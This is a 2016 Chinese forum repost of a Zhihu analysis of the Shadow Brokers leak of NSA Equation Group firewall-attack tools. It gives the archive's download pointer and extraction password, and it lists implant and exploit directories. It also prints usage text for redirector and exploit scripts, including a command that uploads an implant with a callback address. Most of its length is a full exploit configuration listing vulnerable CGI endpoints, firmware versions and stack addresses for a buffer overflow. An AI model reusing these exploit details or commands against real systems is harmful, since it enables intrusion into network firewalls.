中神通公司技术论坛 - Powered by Discuz! Board

标题: 美国NSA方程式组织(Equation Group)爆出的事件，将会造成哪些影响？ [打印本页]

作者: linda 时间: 2016-8-17 22:26 标题: 美国NSA方程式组织(Equation Group)爆出的事件，将会造成哪些影响？

有黑客声称黑进了方程式组织，并且正在拍卖偷来的 Exploits。
/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group

压缩包下载（解压密码： theequationgroup）
MEGA DOWNLOAD EquationGroup Files

作者：王音
链接：https://www.zhihu.com/question/49658687/answer/117123835
来源：知乎
著作权归作者所有，转载请联系作者获得授权。

泄露了两个压缩包，只有free-file的压缩包能解开，另外一个暂时没有密码(100W个比特币)：
$ ls -lah *.gpg-rw-rw-r--@ 1 noname staff 128M 7 25 10:49 eqgrp-auction-file.tar.xz.gpg-rw-rw-r--@ 1 noname staff 182M 7 25 10:50 eqgrp-free-file.tar.xz.gpg

free-file的文件主要涉及的内容是针对防火墙的扫描器、漏洞利用框架等等:

BLATSTING -- 穷举爆破
EXPLOITS -- 漏洞利用代码
OPS -- 攻击操作控制工具包
SCRIPTS -- 脚本资源引用库
TOOLS -- 辅助工具包(编码转换、IP格式转换、加密解密装换等等)

我们通过分析对应攻击payload的文件名，就能大致上猜测出来，具体哪些防火墙版本受到影响，比如下面这个信息，我们就能通过google搜索出思科的CISCO ASA5505防火墙受影响。
# find /Firewall/BANANAGLEE/BG3000/.//Install/SCP/asa5505_clean60000.bin.//Install/SCP/asa5505_clean70000.bin.//Install/SCP/asa5505_cleanE18BF.bin.//Install/SCP/asa5505_cleanEC480.bin.//Install/SCP/asa5505_patch60000.bin.//Install/SCP/asa5505_patchE18BF.bin.//Install/SCP/asa5505_patchEC480.bin.//Install/SCP/asaGen_clean10000_biosVer114or115.bin.//Install/SCP/asaGen_clean20000_biosVer100or112.bin
Juniper NetScreen-ISG 2000 防火墙
# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LPdrwxr-xr-x  23 noname  staff 782B  8 16 12:35 .drwxr-xr-x 3 noname  staff 102B  4 10  2010 ..-rwxr-xr-x 1 noname  staff 1.8M  6 11  2013 BARPUNCH-3110-rwxr-xr-x 1 noname  staff 2.4M  6 11  2013 BICE-3110drwxr-xr-x 6 noname  staff 204B  4 10  2010 Modules-rwxr-xr-x 1 noname  staff 1.7M  6 11  2013 SecondDateCommon-miniprog-3110-rwxr-xr-x 1 noname  staff 7.8K  6 11  2013 bg_redirect.pl-3110-rwxr-xr-x 1 noname  staff 431K  6 11  2013 bg_redirector-3110-rwxr-xr-x 1 noname  staff 1.9M  6 11  2013 cfMiniProg-3110-rwxr-xr-x 1 noname  staff 1.1M  6 11  2013 isg1000-moduledata-3113.tgz-rwxr-xr-x 1 noname  staff 996K  6 11  2013 isg2000-moduledata-3113.tgz-rwxr-xr-x 1 noname  staff 385K  6 11  2013 keygen-3110-rwxr-xr-x 1 noname  staff 285K 10 18  2013 maclist-rwxr-xr-x 1 noname  staff 1.7M  6 11  2013 nsLogMiniProg-3110-rwxr-xr-x 1 noname  staff 413K  6 11  2013 pd_create_ruleset-3110-rwxr-xr-x 1 noname  staff 1.9M  6 11  2013 pd_miniprog-3110-rwxr-xr-x 1 noname  staff 6.2K  6 11  2013 pd_start_pat.pl-3110-rwxr-xr-x 1 noname  staff 1.8M  6 11  2013 profilerIpv4-3100-rwxr-xr-x 1 noname  staff 29M  6 11  2013 ssg300-moduledata-3115.tgz-rwxr-xr-x 1 noname  staff 29M  6 11  2013 ssg500-moduledata-3115.tgz-rwxr-xr-x 1 noname  staff 13K  6 11  2013 start_redirector.pl-3110-rwxr-xr-x 1 noname  staff 42B  6 11  2013 stop_redirector.sh-3110-rwxr-xr-x 1 noname  staff 1.9M  6 11  2013 tunWiz-3110
同目录下是针对该防火墙的利用代码pl、sh，看选项带有attack_ip字眼，自己体会
# perl pd_start_pat.pl-3110Usage: pd_start_pat.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>    [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number>    --attack_ip <attack_ip> --intermediate_ip <intermediate_ip>    --attack_int <interface> --target_int <interface> --port_offset <port offset>    --trans_timeout <timeout> --pat_timeout <seconds> --attack_port <port>    [--logdir <logdir>] [--help]# perl start_redirector.pl-3110 // 隧道攻击工具Usage: start_redirector.pl --lp <LP ip> --implant <Impant ip> --idkey <Implant key file>    [--lptimeout <lp timeout>] [--bsize <benign size>] --cmd <command number> --local_ip <ip>    --clr_tunnel_ip <ip> --enc_tunnel_ip <ip> --orig_src_ip <ip> --enc_redir_ip <ip> --clr_redir_ip <ip>    --target_ip <ip> --enc_tunnel_pt <port> --enc_redir_pt <port>    --enc_iface <interface number> --clr_iface <interface number>    --enc_key <encryption key file> [--proto <protocol>] [--redir_to_target_dest_pt <port>]    [--redir_to_target_src_pt <port>] [--target_to_redir_dest_pt <port>]    [--target_to_redir_src_pt <port>] [--tunnel_to_attacker_dest_pt <port>]    [--tunnel_to_attacker_src_pt <port>] [--restart] --timeout <seconds> [--logdir <logdir>]    [--help]

从整个文件结构来看，整个工具包建立时间为2010年
# ls -la-rw-r--r--@  1 noname  staff 6.0K  8 16 12:35 .DS_Storedrwxr-xr-x 8 noname  staff 272B  4 10  2010 BANANAGLEEdrwxr-xr-x 3 noname  staff 102B  4 10  2010 BARGLEEdrwxr-xr-x 9 noname  staff 306B  4 10  2010 BLATSTINGdrwxr-xr-x 4 noname  staff 136B  4 10  2010 BUZZDIRECTIONdrwxr-xr-x  10 noname  staff 340B  4 10  2010 EXPLOITSdrwxr-xr-x 8 noname  staff 272B  8 16 12:35 OPSdrwxr-xr-x  35 noname  staff 1.2K  8 16 12:35 SCRIPTSdrwxr-xr-x  18 noname  staff 612B  8 16 12:36 TOOLSdrwxr-xr-x 4 noname  staff 136B  8 16 12:35 TURBO-rw-r--r-- 1 noname  staff 19M  4 10  2010 padding

攻击框架的文件构成主要为脚本类型：python、perl、shell 脚本
# find ./ -name *.py | wc -l    235# find ./ -name *.pl | wc -l    7# find ./ -name *.sh | wc -l    15

BombShell的工具
Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.pyUsage: eligiblebombshell_1.2.0.1.py [options]See -h for specific options (some of which are required).Examples:Scan to find (unknown versions) or confirm (known versions) vulnerability:  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --scan -vOnce a valid entry is in ELBO.config, upload nopen:  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -vDelete uploaded files from the previous step:  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --cleanup -veligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!

与eligiblebombshell_1.2.0.1对应的攻击配置文件
# ELBO.config## format for known versions:# ETAG = <ETag> : <action> : 0x<stack addr> : <version># format for unknown versions:# ETAG = <ETag> : <action> : 0x<stack addr>## The device returns wacky, invalid ETags sometimes. This file just records# the "normal" looking parts (without "" and other characters). E.g.:## device ETag    | this file# ---------------------|------------------# "e8-569-46b6b873" | e8-569-46b6b873# "3991-583-4727f5a3"  | 3991-583-4727f5a3# W/"55b-583-47958bb3" | 55b-583-47958bb3# W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8# W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7# W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f# Path to RATNOSERVER = /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static ################################## ETags from actual hardware################################## testedETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1# added Dec. 2009 - WOBBLYLLAMAETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003# added Mar. 2010 - FLOCKFORWARDETAG =  6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1# added Mar. 2010 - HIDDENTEMPLEETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1# added May. 2010 - CONTAINMENTGRIDETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1#BLATSTING SUPPORT FOR ALL ABOVE# added Sep. 2010 - GOTHAMKNIGHTETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27#################################################################### BELOW IS FOR DEVELOPERS ONLY#################################################################### Etags and address from real hardware#ETAG = e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1#ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1#ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1#ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1#ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1# ETags and addresses from milliways#ETAG = e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1#ETAG =  55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1#ETAG =  55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1#ETAG =  600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1#ETAG =  69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1#ETAG = e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1#ETAG =  55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1#ETAG =  55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1#ETAG =  600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1#################################################################### SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):# SCANPLAN = <action> : <min etag date> : <max etag date> : <comma-delimited list of addresses># Notes:# - The full list of addresses must be all on one line.# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit's# buffer overflow.# - The --etag argument will be matched against the min/max dates of these scanplans. If more than# one plan matches, they will be tried in the order they're listed in this file. If none match,# the user will get an error to that effect.# libc attacks - scan plan is simple (try them both)SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the lowSCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the highSCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180# for dates in between the two, try low and high addresses interleavedSCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180# for dates <= versions we've see with stack at 0xc0000000, try the high addresses and then the lowSCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180# for dates >= versions we've seen with stack at 0x8000000, try the low addresses and then the highSCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180# for dates in between the two, try low and high addresses interleavedSCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180

https://www.zhihu.com/question/49658687/answer/117123835

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)